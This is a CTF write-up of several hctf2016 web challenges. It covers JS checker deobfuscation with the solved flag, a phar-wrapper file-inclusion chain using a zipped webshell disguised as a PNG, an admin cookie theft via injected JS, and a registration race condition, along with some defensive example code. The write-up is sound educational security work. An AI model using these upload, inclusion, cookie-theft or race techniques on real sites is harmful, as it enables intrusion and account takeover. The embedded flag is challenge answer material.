hctf2016 web (partial) WriteUp

Source: Internet | Editor: 程序博客网 | Time: 2024/04/29 15:07

I forget whether we finished 18th or 19th this time; we are still too weak. We opened level 4 too late and were stuck on problems for a whole night. The team's pwn and misc still need work: we did not solve a single pwn, which hurts.
Working through the remaining problems afterwards, I feel that with three more hours we could have solved 大图书馆的牧羊人 and AT feild, which would have pushed us into the top 15. Still, we are fairly satisfied this time: we are a rookie team, everyone is still inexperienced, and there were no Android challenges this time... OK, no more consoling myself. Let me set a goal: next regional round we must make the top 15.

I had my own problems too. For example, I did eventually solve secretdata, but it cost at least an extra hour only because the directory scan turned up a phpmyadmin, and I figured that the organizers putting that there on a challenge named secretdata had to mean something, so I fiddled with that page like an idiot. When I sent the JS over, I did not have it send back the cookie right away either; instead I kept making the admin visit phpmyadmin, profile.php and so on. It would have been simpler to just grab the cookie and log in from the start. One thing I did notice, though: when the admin visited user.php, why did it not return a flag to me, only a user.php identical to ours, yet when I finally logged in with the cookie the flag really was in user.php? I cannot figure that one out.

Also, I only solved rsa1 and not rsa2 this time, which is a pity, and by the end I still had no idea how rsa2 was meant to be done. The road of learning is long. Take it slow.

Anyway, saying anything after the contest is too late; I will push harder next time. I also forgot to write up the problems I solved afterwards; I will add them when I get the chance.

    • 2099年的flag (The flag of 2099)
    • RESTful
    • giligili
    • 兵者多诡 (Soldiers are full of tricks)
    • 必须比香港记者还要快 (Must be faster than Hong Kong reporters)
    • guestbook
    • secret data

2099年的flag (The flag of 2099)

Just modify the request header.

(screenshot)

RESTful

The prompt says to use PUT, and the resulting hint says it is a RESTful architecture, so just construct the request directly.

(screenshot)

giligili

http://lorexxar.cn/2016/04/11/sctf-Obfusion/

Viewing the source shows this is a JS decryption challenge. The code is as follows:

```javascript
var _ = {
    0x4c19cff: "random", 0x4728122: "charCodeAt", 0x2138878: "substring",
    0x3ca9c7b: "toString", 0x574030a: "eval", 0x270aba9: "indexOf",
    0x221201f: function(_9) { var _8 = []; for (var _a = 0, _b = _9.length; _a < _b; _a++) { _8.push(Number(_9.charCodeAt(_a)).toString(16)); } return "0x" + _8.join(""); },
    0x240cb06: function(_2, _3) { var _4 = Math.max(_2.length, _3.length); var _7 = _2 + _3; var _6 = ""; for(var _5=0; _5<_4; _5++) { _6 += _7.charAt((_2.charCodeAt(_5%_2.length) ^ _3.charCodeAt(_5%_3.length)) % _4); } return _6; },
    0x5c623d0: function(_c, _d) { var _e = ""; for(var _f=0; _f<_d; _f++) { _e += _c; } return _e; }
};
var $ = [ 0x4c19cff, 0x3cfbd6c, 0xb3f970, 0x4b9257a, 0x1409cc7, 0x46e990e, 0x2138878, 0x1e1049, 0x164a1f9, 0x494c61f,
          0x490f545, 0x51ecfcb, 0x4c7911a, 0x29f7b65, 0x4dde0e4, 0x49f889f, 0x5ebd02c, 0x556f342, 0x3f7f3f6, 0x11544aa,
          0x53ed47d, 0x697a, 0x623f21c1, 0x5c623d0, 0x32e8f8b, 0x3ca9c7b, 0x367a49b, 0x360179b, 0x5c862d6, 0x30dc1af,
          0x7797d1, 0x221201f, 0x5eb4345, 0x5e9baad, 0x39b3b47, 0x32f0b8f, 0x48554de, 0x3e8b5e8, 0x5e4f31f, 0x48a53a6,
          0x270aba9, 0x240cb06, 0x574030a, 0x1618f3a, 0x271259f, 0x3a306e5, 0x1d33b46, 0x17c29b5, 0x1cf02f4, 0xeb896b ];
var a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z;
function check() {
    var answer = document.getElementById("message").value;
    var correct = (function() {
        try {
            h = new MersenneTwister(parseInt(btoa(answer[_[$[6]]](0, 4)), 32));
            e = h[_[$[""+ +[]]]]()*(""+{})[_[0x4728122]](0xc); for(var _1=0; _1<h.mti; _1++) { e ^= h.mt[_1]; }
            l = new MersenneTwister(e), v = true;
            l.random(); l.random(); l.random();
            o = answer.split("_");
            i = l.mt[~~(h.random()*$[0x1f])%0xff];
            s = ["0x" + i[_[$[$.length/2]]](0x10), "0x" + e[_[$[$.length/2]]](0o20).split("-")[1]];
            e =- (this[_[$[42]]](_[$[31]](o[1])) ^ s[0]); if (-e != $[21]) return false;
            e ^= (this[_[$[42]]](_[$[31]](o[2])) ^ s[1]); if (-e != $[22]) return false; e -= 0x352c4a9b;
            t = new MersenneTwister(Math.sqrt(-e));
            h.random();
            a = l.random();
            t.random();
            y = [ 0xb3f970, 0x4b9257a, 0x46e990e ].map(function(i) { return $[_[$[40]]](i)+ +1+ -1- +1; });
            o[0] = o[0].substring(5); o[3] = o[3].substring(0, o[3].length - 1);
            u = ~~~~~~~~~~~~~~~~(a * i); if (o[0].length > 5) return false;
            a = parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3) ^ eval(_[$[31]](o[0]));
            r = (h.random() * l.random() * t.random()) / (h.random() * l.random() * t.random());
            e ^= ~r;
            r = (h.random() / l.random() / t.random()) / (h.random() * l.random() * t.random());
            e ^= ~~r;
            a += _[$[31]](o[3].substring(o[3].length - 2)).split("x")[1]; if (parseInt(a.split("84")[1], $.length/2) != 0x4439feb) return false;
            d = parseInt(a, 16) == (Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + "");
            i = 0xffff;
            n = (p = (f = _[$[23]](o[3].charAt(o[3].length - 4), 3)) == o[3].substring(1, 4));
            g = 3;
            t = _[$[23]](o[3].charAt(3), 3) == o[3].substring(5, 8) && o[3].charCodeAt(1) * o[0].charCodeAt(0) == 0x2ef3;
            h = ((31249*g) & i).toString(16);
            i = _[$[31]](o[3].split(f).join("").substring(0, 2)).split("x")[1];
            s = i == h;
            return (p & t & s & d) === 1 || (p & t & s & d) === true;
        } catch (e) {
            console.log("gg");
            return false;
        }
    })();
    document.getElementById("message").placeholder = correct ? "correct" : "wrong";
    if (correct) {
        alert("Congratulations! you got it!");
    } else {
        alert("Sorry, you are wrong...");
    }
};
```

For this kind of problem you just throw it into the console and debug furiously with inputs and outputs; there is not much technical content, and anyone can solve it given enough time.
Below is the debugging code (the MersenneTwister and CryptoJS sources are the ones shipped with the challenge page; `check()` is the challenge's checker with the answer hard-coded and `console.log` calls inserted, meant to be pasted into the browser console).

```javascript
var MersenneTwister = function(seed) {
  if (seed == undefined) {
    seed = new Date().getTime();
  }
  /* Period parameters */
  this.N = 624;
  this.M = 397;
  this.MATRIX_A = 0x9908b0df;   /* constant vector a */
  this.UPPER_MASK = 0x80000000; /* most significant w-r bits */
  this.LOWER_MASK = 0x7fffffff; /* least significant r bits */
  this.mt = new Array(this.N); /* the array for the state vector */
  this.mti=this.N+1; /* mti==N+1 means mt[N] is not initialized */
  this.init_genrand(seed);
}
/* initializes mt[N] with a seed */
MersenneTwister.prototype.init_genrand = function(s) {
  this.mt[0] = s >>> 0;
  for (this.mti=1; this.mti<this.N; this.mti++) {
    var s = this.mt[this.mti-1] ^ (this.mt[this.mti-1] >>> 30);
    this.mt[this.mti] = (((((s & 0xffff0000) >>> 16) * 1812433253) << 16) + (s & 0x0000ffff) * 1812433253)  + this.mti;
    /* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
    /* In the previous versions, MSBs of the seed affect   */
    /* only MSBs of the array mt[].                        */
    /* 2002/01/09 modified by Makoto Matsumoto             */
    this.mt[this.mti] >>>= 0;
    /* for >32 bit machines */
  }
}
/* initialize by an array with array-length */
/* init_key is the array for initializing keys */
/* key_length is its length */
/* slight change for C++, 2004/2/26 */
MersenneTwister.prototype.init_by_array = function(init_key, key_length) {
  var i, j, k;
  this.init_genrand(19650218);
  i=1; j=0;
  k = (this.N>key_length ? this.N : key_length);
  for (; k; k--) {
    var s = this.mt[i-1] ^ (this.mt[i-1] >>> 30)
    this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1664525) << 16) + ((s & 0x0000ffff) * 1664525)))
      + init_key[j] + j; /* non linear */
    this.mt[i] >>>= 0; /* for WORDSIZE > 32 machines */
    i++; j++;
    if (i>=this.N) { this.mt[0] = this.mt[this.N-1]; i=1; }
    if (j>=key_length) j=0;
  }
  for (k=this.N-1; k; k--) {
    var s = this.mt[i-1] ^ (this.mt[i-1] >>> 30);
    this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1566083941) << 16) + (s & 0x0000ffff) * 1566083941))
      - i; /* non linear */
    this.mt[i] >>>= 0; /* for WORDSIZE > 32 machines */
    i++;
    if (i>=this.N) { this.mt[0] = this.mt[this.N-1]; i=1; }
  }
  this.mt[0] = 0x80000000; /* MSB is 1; assuring non-zero initial array */
}
/* generates a random number on [0,0xffffffff]-interval */
MersenneTwister.prototype.genrand_int32 = function() {
  var y;
  var mag01 = new Array(0x0, this.MATRIX_A);
  /* mag01[x] = x * MATRIX_A  for x=0,1 */
  if (this.mti >= this.N) { /* generate N words at one time */
    var kk;
    if (this.mti == this.N+1)   /* if init_genrand() has not been called, */
      this.init_genrand(5489); /* a default initial seed is used */
    for (kk=0;kk<this.N-this.M;kk++) {
      y = (this.mt[kk]&this.UPPER_MASK)|(this.mt[kk+1]&this.LOWER_MASK);
      this.mt[kk] = this.mt[kk+this.M] ^ (y >>> 1) ^ mag01[y & 0x1];
    }
    for (;kk<this.N-1;kk++) {
      y = (this.mt[kk]&this.UPPER_MASK)|(this.mt[kk+1]&this.LOWER_MASK);
      this.mt[kk] = this.mt[kk+(this.M-this.N)] ^ (y >>> 1) ^ mag01[y & 0x1];
    }
    y = (this.mt[this.N-1]&this.UPPER_MASK)|(this.mt[0]&this.LOWER_MASK);
    this.mt[this.N-1] = this.mt[this.M-1] ^ (y >>> 1) ^ mag01[y & 0x1];
    this.mti = 0;
  }
  y = this.mt[this.mti++];
  /* Tempering */
  y ^= (y >>> 11);
  y ^= (y << 7) & 0x9d2c5680;
  y ^= (y << 15) & 0xefc60000;
  y ^= (y >>> 18);
  return y >>> 0;
}
/* generates a random number on [0,0x7fffffff]-interval */
MersenneTwister.prototype.genrand_int31 = function() {
  return (this.genrand_int32()>>>1);
}
/* generates a random number on [0,1]-real-interval */
MersenneTwister.prototype.genrand_real1 = function() {
  return this.genrand_int32()*(1.0/4294967295.0);
  /* divided by 2^32-1 */
}
/* generates a random number on [0,1)-real-interval */
MersenneTwister.prototype.random = function() {
  return this.genrand_int32()*(1.0/4294967296.0);
  /* divided by 2^32 */
}
/* generates a random number on (0,1)-real-interval */
MersenneTwister.prototype.genrand_real3 = function() {
  return (this.genrand_int32() + 0.5)*(1.0/4294967296.0);
  /* divided by 2^32 */
}
/* generates a random number on [0,1) with 53-bit resolution*/
MersenneTwister.prototype.genrand_res53 = function() {
  var a=this.genrand_int32()>>>5, b=this.genrand_int32()>>>6;
  return(a*67108864.0+b)*(1.0/9007199254740992.0);
}
/* Minified CryptoJS (SHA1 core) exactly as shipped with the challenge page; it is not used by check(). */
/*CryptoJS v3.1.2code.google.com/p/crypto-js(c) 2009-2013 by Jeff Mott. All rights reserved.code.google.com/p/crypto-js/wiki/License*/var CryptoJS=CryptoJS||function(e,m){var p={},j=p.lib={},l=function(){},f=j.Base={extend:function(a){l.prototype=this;var c=new l;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},n=j.WordArray=f.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=m?c:4*a.length},toString:function(a){return(a||h).stringify(this)},concat:function(a){var c=this.words,q=a.words,d=this.sigBytes;a=a.sigBytes;this.clamp();if(d%4)for(var b=0;b<a;b++)c[d+b>>>2]|=(q[b>>>2]>>>24-8*(b%4)&255)<<24-8*((d+b)%4);else if(65535<q.length)for(b=0;b<a;b+=4)c[d+b>>>2]=q[b>>>2];else c.push.apply(c,q);this.sigBytes+=a;return this},clamp:function(){var a=this.words,c=this.sigBytes;a[c>>>2]&=4294967295<<32-8*(c%4);a.length=e.ceil(c/4)},clone:function(){var a=f.clone.call(this);a.words=this.words.slice(0);return a},random:function(a){for(var c=[],b=0;b<a;b+=4)c.push(4294967296*e.random()|0);return new n.init(c,a)}}),b=p.enc={},h=b.Hex={stringify:function(a){var c=a.words;a=a.sigBytes;for(var b=[],d=0;d<a;d++){var f=c[d>>>2]>>>24-8*(d%4)&255;b.push((f>>>4).toString(16));b.push((f&15).toString(16))}return b.join("")},parse:function(a){for(var c=a.length,b=[],d=0;d<c;d+=2)b[d>>>3]|=parseInt(a.substr(d,2),16)<<24-4*(d%8);return new n.init(b,c/2)}},g=b.Latin1={stringify:function(a){var c=a.words;a=a.sigBytes;for(var b=[],d=0;d<a;d++)b.push(String.fromCharCode(c[d>>>2]>>>24-8*(d%4)&255));return b.join("")},parse:function(a){for(var c=a.length,b=[],d=0;d<c;d++)b[d>>>2]|=(a.charCodeAt(d)&255)<<24-8*(d%4);return new n.init(b,c)}},r=b.Utf8={stringify:function(a){try{return decodeURIComponent(escape(g.stringify(a)))}catch(c){throw Error("Malformed UTF-8 data");}},parse:function(a){return g.parse(unescape(encodeURIComponent(a)))}},k=j.BufferedBlockAlgorithm=f.extend({reset:function(){this._data=new n.init;this._nDataBytes=0},_append:function(a){"string"==typeof a&&(a=r.parse(a));this._data.concat(a);this._nDataBytes+=a.sigBytes},_process:function(a){var c=this._data,b=c.words,d=c.sigBytes,f=this.blockSize,h=d/(4*f),h=a?e.ceil(h):e.max((h|0)-this._minBufferSize,0);a=h*f;d=e.min(4*a,d);if(a){for(var g=0;g<a;g+=f)this._doProcessBlock(b,g);g=b.splice(0,a);c.sigBytes-=d}return new n.init(g,d)},clone:function(){var a=f.clone.call(this);a._data=this._data.clone();return a},_minBufferSize:0});j.Hasher=k.extend({cfg:f.extend(),init:function(a){this.cfg=this.cfg.extend(a);this.reset()},reset:function(){k.reset.call(this);this._doReset()},update:function(a){this._append(a);this._process();return this},finalize:function(a){a&&this._append(a);return this._doFinalize()},blockSize:16,_createHelper:function(a){return function(c,b){return(new a.init(b)).finalize(c)}},_createHmacHelper:function(a){return function(b,f){return(new s.HMAC.init(a,f)).finalize(b)}}});var s=p.algo={};return p}(Math);(function(){var e=CryptoJS,m=e.lib,p=m.WordArray,j=m.Hasher,l=[],m=e.algo.SHA1=j.extend({_doReset:function(){this._hash=new p.init([1732584193,4023233417,2562383102,271733878,3285377520])},_doProcessBlock:function(f,n){for(var b=this._hash.words,h=b[0],g=b[1],e=b[2],k=b[3],j=b[4],a=0;80>a;a++){if(16>a)l[a]=f[n+a]|0;else{var c=l[a-3]^l[a-8]^l[a-14]^l[a-16];l[a]=c<<1|c>>>31}c=(h<<5|h>>>27)+j+l[a];c=20>a?c+((g&e|~g&k)+1518500249):40>a?c+((g^e^k)+1859775393):60>a?c+((g&e|g&k|e&k)-1894007588):c+((g^e^k)-899497514);j=k;k=e;e=g<<30|g>>>2;g=h;h=c}b[0]=b[0]+h|0;b[1]=b[1]+g|0;b[2]=b[2]+e|0;b[3]=b[3]+k|0;b[4]=b[4]+j|0},_doFinalize:function(){var f=this._data,e=f.words,b=8*this._nDataBytes,h=8*f.sigBytes;e[h>>>5]|=128<<24-h%32;e[(h+64>>>9<<4)+14]=Math.floor(b/4294967296);e[(h+64>>>9<<4)+15]=b;f.sigBytes=4*e.length;this._process();return this._hash},clone:function(){var e=j.clone.call(this);e._hash=this._hash.clone();return e}});e.SHA1=j._createHelper(m);e.HmacSHA1=j._createHmacHelper(m)})();
/* These real versions are due to Isaku Wada, 2002/01/09 added */
Array.prototype.includes||(Array.prototype.includes=function(a){"use strict";var b=Object(this),c=parseInt(b.length)||0;if(0===c)return!1;var e,d=parseInt(arguments[1])||0;d>=0?e=d:(e=c+d,0>e&&(e=0));for(var f;c>e;){if(f=b[e],a===f||a!==a&&f!==f)return!0;e++}return!1});
var _ = {
    0x4c19cff: "random", 0x4728122: "charCodeAt", 0x2138878: "substring",
    0x3ca9c7b: "toString", 0x574030a: "eval", 0x270aba9: "indexOf",
    0x221201f: function(_9) { var _8 = []; for (var _a = 0, _b = _9.length; _a < _b; _a++) { _8.push(Number(_9.charCodeAt(_a)).toString(16)); } return "0x" + _8.join(""); },
    0x240cb06: function(_2, _3) { var _4 = Math.max(_2.length, _3.length); var _7 = _2 + _3; var _6 = ""; for(var _5=0; _5<_4; _5++) { _6 += _7.charAt((_2.charCodeAt(_5%_2.length) ^ _3.charCodeAt(_5%_3.length)) % _4); } return _6; },
    0x5c623d0: function(_c, _d) { var _e = ""; for(var _f=0; _f<_d; _f++) { _e += _c; } return _e; }
};
var $ = [ 0x4c19cff, 0x3cfbd6c, 0xb3f970, 0x4b9257a, 0x1409cc7, 0x46e990e, 0x2138878, 0x1e1049, 0x164a1f9, 0x494c61f,
          0x490f545, 0x51ecfcb, 0x4c7911a, 0x29f7b65, 0x4dde0e4, 0x49f889f, 0x5ebd02c, 0x556f342, 0x3f7f3f6, 0x11544aa,
          0x53ed47d, 0x697a, 0x623f21c1, 0x5c623d0, 0x32e8f8b, 0x3ca9c7b, 0x367a49b, 0x360179b, 0x5c862d6, 0x30dc1af,
          0x7797d1, 0x221201f, 0x5eb4345, 0x5e9baad, 0x39b3b47, 0x32f0b8f, 0x48554de, 0x3e8b5e8, 0x5e4f31f, 0x48a53a6,
          0x270aba9, 0x240cb06, 0x574030a, 0x1618f3a, 0x271259f, 0x3a306e5, 0x1d33b46, 0x17c29b5, 0x1cf02f4, 0xeb896b ];
var a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z;
function check() {
    var answer ="hctf{wh3r3_iz_y0ur_neee3eeed??}"
    var correct = (function() {
        try {
            h = new MersenneTwister(parseInt(btoa(answer[_[$[6]]](0, 4)), 32));
            e = h[_[$[""+ +[]]]]()*(""+{})[_[0x4728122]](0xc); for(var _1=0; _1<h.mti; _1++) { e ^= h.mt[_1]; }
            console.log("e:"+e);
            l = new MersenneTwister(e), v = true;
            l.random(); l.random(); l.random();
            o = answer.split("_");
            i = l.mt[~~(h.random()*$[0x1f])%0xff];
            console.log("i:"+i);
            s = ["0x" + i[_[$[$.length/2]]](0x10), "0x" + e[_[$[$.length/2]]](0o20).split("-")[1]];
            console.log("s:"+s);
            console.log(this[_[$[42]]](_[$[31]](o[1])) ^ s[0]);
            e =-(this[_[$[42]]](_[$[31]](o[1])) ^ s[0]); if (-e != $[21]) return false;
            console.log("e2:"+e);
            e ^= (this[_[$[42]]](_[$[31]](o[2])) ^ s[1]); if (-e != $[22]) return false; e -= 0x352c4a9b;
            console.log("e3:"+e);
            t = new MersenneTwister(Math.sqrt(-e));
            h.random();
            a = l.random();
            t.random();
            y = [ 0xb3f970, 0x4b9257a, 0x46e990e ].map(function(i) { return $[_[$[40]]](i)+ +1+ -1- +1; });
            console.log("y:"+y);
            o[0] = o[0].substring(5);
            o[3] = o[3].substring(0, o[3].length - 1);
            a = parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3) ^ eval(_[$[31]](o[0]));
            console.log("a:"+a);
            console.log("a2:"+parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3));
            r = (h.random() * l.random() * t.random()) / (h.random() * l.random() * t.random());
            e ^= ~r;
            console.log("e4:"+e);
            r = (h.random() / l.random() / t.random()) / (h.random() * l.random() * t.random());
            e ^= ~~r;
            console.log("e5:"+e);
            console.log(_[$[31]](o[3].substring(o[3].length - 2)));
            a += _[$[31]](o[3].substring(o[3].length - 2)).split("x")[1];
            console.log($.length/2);
            console.log(parseInt(a, 16));
            console.log((Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + ""));
            if (parseInt(a.split("84")[1], $.length/2) != 0x4439feb) return false;
            console.log(1);
            d = parseInt(a, 16) == (Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + "");
            i = 0xffff;
            n = (p = (f = _[$[23]](o[3].charAt(o[3].length - 4), 3)) == o[3].substring(1, 4));
            g = 3;
            t = _[$[23]](o[3].charAt(3), 3) == o[3].substring(5, 8) && o[3].charCodeAt(1) * o[0].charCodeAt(0) == 0x2ef3;
            console.log(d+n+t);
            h = ((31249*g) & i).toString(16);
            console.log(o[3].split(f).join("").substring(0, 2));
            i = _[$[31]](o[3].split(f).join("").substring(0, 2)).split("x")[1];
            console.log(h+":"+i);
            s = i == h;
            return (p & t & s & d) === 1 || (p & t & s & d) === true;
        } catch (e) {
            console.log("error!");
            return false;
        }
    })();
    console.log("correct:"+correct);
};
check();
```
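As an added example (not code from the writeup or from the challenge), a small static rewriter for the two-level indirection the checker uses: `_[$[i]]` indexes the `$` array to obtain a hex key and then looks that key up in the `_` table. Resolving the indices once makes the checker readable without stepping through it in the console. The constants are copied from the challenge; the names `strToHex`, `xorMix` and `repeat` for the three helper functions are labels chosen here from what those functions do, not names that appear in the challenge.

```javascript
// Static resolver for the giligili checker's `_[$[i]]` indirection.
// NAMES maps each hex key of the challenge's `_` table to a readable name;
// the three function-valued entries get labels chosen here (assumption).
const NAMES = {
  0x4c19cff: "random", 0x4728122: "charCodeAt", 0x2138878: "substring",
  0x3ca9c7b: "toString", 0x574030a: "eval", 0x270aba9: "indexOf",
  0x221201f: "strToHex", 0x240cb06: "xorMix", 0x5c623d0: "repeat",
};
// The challenge's `$` array, copied verbatim (50 entries).
const TABLE = [
  0x4c19cff, 0x3cfbd6c, 0xb3f970, 0x4b9257a, 0x1409cc7, 0x46e990e, 0x2138878, 0x1e1049, 0x164a1f9, 0x494c61f,
  0x490f545, 0x51ecfcb, 0x4c7911a, 0x29f7b65, 0x4dde0e4, 0x49f889f, 0x5ebd02c, 0x556f342, 0x3f7f3f6, 0x11544aa,
  0x53ed47d, 0x697a, 0x623f21c1, 0x5c623d0, 0x32e8f8b, 0x3ca9c7b, 0x367a49b, 0x360179b, 0x5c862d6, 0x30dc1af,
  0x7797d1, 0x221201f, 0x5eb4345, 0x5e9baad, 0x39b3b47, 0x32f0b8f, 0x48554de, 0x3e8b5e8, 0x5e4f31f, 0x48a53a6,
  0x270aba9, 0x240cb06, 0x574030a, 0x1618f3a, 0x271259f, 0x3a306e5, 0x1d33b46, 0x17c29b5, 0x1cf02f4, 0xeb896b,
];

// Fold the constant tricks the checker uses as indices: `""+ +[]` is "0",
// `$.length/2` is 25, and plain decimal or hex literals are themselves.
function evalIndex(expr) {
  const e = expr.trim();
  if (e === '""+ +[]') return 0;
  if (e === "$.length/2") return TABLE.length / 2;
  if (/^(0x[0-9a-f]+|\d+)$/i.test(e)) return Number(e);
  return null; // unknown index expression: leave it untouched
}

// Name behind `_[$[idx]]`, or null when the index or key is unknown.
function lookup(idx) {
  const key = TABLE[idx];
  return key === undefined ? null : (NAMES[key] || null);
}

// An index expression: any run of non-bracket characters, allowing the
// literal `[]` that appears in `""+ +[]`.
const IDX = "((?:[^\\[\\]]|\\[\\])+)";

function deobfuscate(src) {
  let out = src;
  // obj[_[$[idx]]]  ->  obj.name
  out = out.replace(new RegExp("\\[_\\[\\$\\[" + IDX + "\\]\\]\\]", "g"), (m, idx) => {
    const i = evalIndex(idx);
    const name = i === null ? null : lookup(i);
    return name ? "." + name : m;
  });
  // _[$[idx]](...)  ->  _.name(...)   (direct calls of the helper functions)
  out = out.replace(new RegExp("_\\[\\$\\[" + IDX + "\\]\\]", "g"), (m, idx) => {
    const i = evalIndex(idx);
    const name = i === null ? null : lookup(i);
    return name ? "_." + name : m;
  });
  // obj[_[0x...]]  ->  obj.name   (the one place the key is used directly)
  out = out.replace(/\[_\[(0x[0-9a-f]+)\]\]/gi, (m, key) => {
    const name = NAMES[Number(key)];
    return name ? "." + name : m;
  });
  // remaining $[idx]  ->  the hex constant it holds
  out = out.replace(new RegExp("\\$\\[" + IDX + "\\]", "g"), (m, idx) => {
    const i = evalIndex(idx);
    return i === null || TABLE[i] === undefined ? m : "0x" + TABLE[i].toString(16);
  });
  return out;
}
```

Feeding the lines of `check()` through `deobfuscate` turns, for instance, `h[_[$[6]]](0, 4)` into `h.substring(0, 4)` and `if (-e != $[21])` into `if (-e != 0x697a)`, which is the form in which the per-segment constraints on the flag are easiest to read off.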

兵者多诡 (Soldiers are full of tricks)

There is an upload point and a file-inclusion point.

First use the file inclusion to obtain the page source. Including the uploaded image directly does not work, so consider stream wrappers (pseudo-protocols); in the end the phar wrapper does the job.

Create a 0.php containing a one-line webshell, zip it, rename the archive to a .png suffix (0.png) and upload it, then execute commands directly through the phar wrapper, as shown below:

(screenshot)
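As an added example (not from the writeup or the challenge), the server-side checks that would have broken this chain, written for Node: the upload side sniffs the file's leading bytes instead of trusting the extension, so a zip archive renamed to 0.png is refused, and the include side rejects any parameter that carries a stream-wrapper scheme such as `phar://` and only accepts names from an allow-list. The signature table and the sample buffers are constructed here; the allow-listed page names are an assumption.

```javascript
// Upload sniffing: decide the type from the leading bytes, not the name.
const SIGNATURES = [
  { type: "png",  magic: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: "jpeg", magic: [0xff, 0xd8, 0xff] },
  { type: "gif",  magic: [0x47, 0x49, 0x46, 0x38] },
  // zip is one of the container formats the phar wrapper will open
  { type: "zip",  magic: [0x50, 0x4b, 0x03, 0x04] },
];
const IMAGE_TYPES = new Set(["png", "jpeg", "gif"]);
const EXT_TO_TYPE = { png: "png", jpg: "jpeg", jpeg: "jpeg", gif: "gif" };

function sniffType(buf) {
  for (const s of SIGNATURES) {
    if (buf.length >= s.magic.length && s.magic.every((b, i) => buf[i] === b)) return s.type;
  }
  return "unknown";
}

// Accept only when the declared extension and the sniffed content agree
// and both are image types.
function inspectUpload(buf, filename) {
  const ext = (filename.split(".").pop() || "").toLowerCase();
  const declared = EXT_TO_TYPE[ext] || "unknown";
  const detected = sniffType(buf);
  const accepted = IMAGE_TYPES.has(declared) && declared === detected;
  return { declared, detected, accepted };
}

// Include-parameter check: no scheme prefix (phar://, php://, data://, ...),
// no traversal or path separators, no NUL, and the name must be allow-listed.
const INCLUDABLE = new Set(["index", "upload", "view"]); // assumed page names
function isSafeIncludeTarget(param) {
  if (/^[a-z][a-z0-9+.-]*:/i.test(param)) return false;
  if (param.includes("..") || param.includes("/") || param.includes("\\")) return false;
  if (param.includes("\0")) return false;
  return INCLUDABLE.has(param);
}

// Constructed samples: a genuine PNG header, and a zip header under a .png name.
const SAMPLE_PNG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00, 0x00, 0x0d]);
const SAMPLE_ZIP_AS_PNG = Buffer.from([0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00, 0x08, 0x00]);
```

Either check alone would have stopped the chain: the renamed archive never reaches the upload directory, and even if it did, `phar://upload/0.png/0.php` never reaches `include`.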

必须比香港记者还要快 (Must be faster than Hong Kong reporters)

A race condition.

Scanning the directory reveals a README.md with the following content:

```markdown
# Runs faster than anyone (跑得比谁都快)
## The story of the ChangeLog
## This is the README.md that should have been deleted after adding .git  XD by Aklis
## ChangeLog
- 2016.11.11 Finished the login feature. After login, the username and user level are stored in the session. index.php checks whether session['level'] may see the **stuff** only an administrator can see. XD
- 2016.11.10 The boss said a freshly registered user must not be an administrator, so I added one more statement to downgrade the privilege to a normal user.
- 2016.10 I finished writing the registration feature.
```

Note that it says "added one more statement to downgrade the privilege to a normal user". That immediately suggests a race condition: log in from many threads and get in before the downgrade statement has executed. At the time I simply opened two Intruders in Burp, one running registration and one running login, with "follow redirects" checked; with a high enough thread count you get the flag directly. I did not take a screenshot at the end, but there is not much technical content here anyway.
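The race described in the README, modelled deterministically as an added example (not the challenge's code): `registerTwoStep` mirrors "insert the user, then run one more statement to downgrade the level", and the `between` hook stands in for whatever a concurrent login request does while the downgrade has not yet run. `registerAtomic` shows the fix, deciding the level before the row becomes visible (in SQL terms: set the final level in the INSERT itself, or run both statements in one transaction). The user names and the in-memory store are constructed here.

```javascript
// In-memory stand-in for the users table.
const users = new Map();

// The README's flow: the row is inserted (with the default level, which
// here is "admin"), and only afterwards a second statement demotes it.
function registerTwoStep(name, between) {
  users.set(name, { name, level: "admin" }); // step 1: row visible as admin
  if (between) between();                     // window another request can use
  users.get(name).level = "user";             // step 2: the afterthought demotion
}

// Fixed flow: the level is decided before the row is visible at all.
function registerAtomic(name, between) {
  const row = { name, level: "user" };
  if (between) between();                     // nothing to find yet
  users.set(name, row);
}

// Login copies the level into the session, so whatever level the row had
// at this instant is what index.php will later trust.
function login(name) {
  const u = users.get(name);
  return u ? { name: u.name, level: u.level } : null;
}

// Run one registration with a login racing into its window; return the
// session the racing login obtained (null if the user did not exist yet).
function demo(register) {
  users.clear();
  let session = null;
  register("alice", () => { session = login("alice"); });
  return session;
}
```

With `registerTwoStep` the racing login captures `level: "admin"` into the session and keeps it even though the row is demoted a moment later; with `registerAtomic` the same login finds no user at all, and a login after registration gets `"user"`.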

guestbook

A CSP bypass challenge. First you need to brute-force an MD5 prefix; I wrote the following code:

```python
from hashlib import md5

# Proof-of-work helper for the guestbook: find a number whose MD5 hex
# digest starts with the 4-character prefix the page asks for.
while True:
    prefix = input("md5: ")
    for i in range(100000000):
        if md5(str(i).encode()).hexdigest()[0:4] == prefix:
            print(i)
            break
```

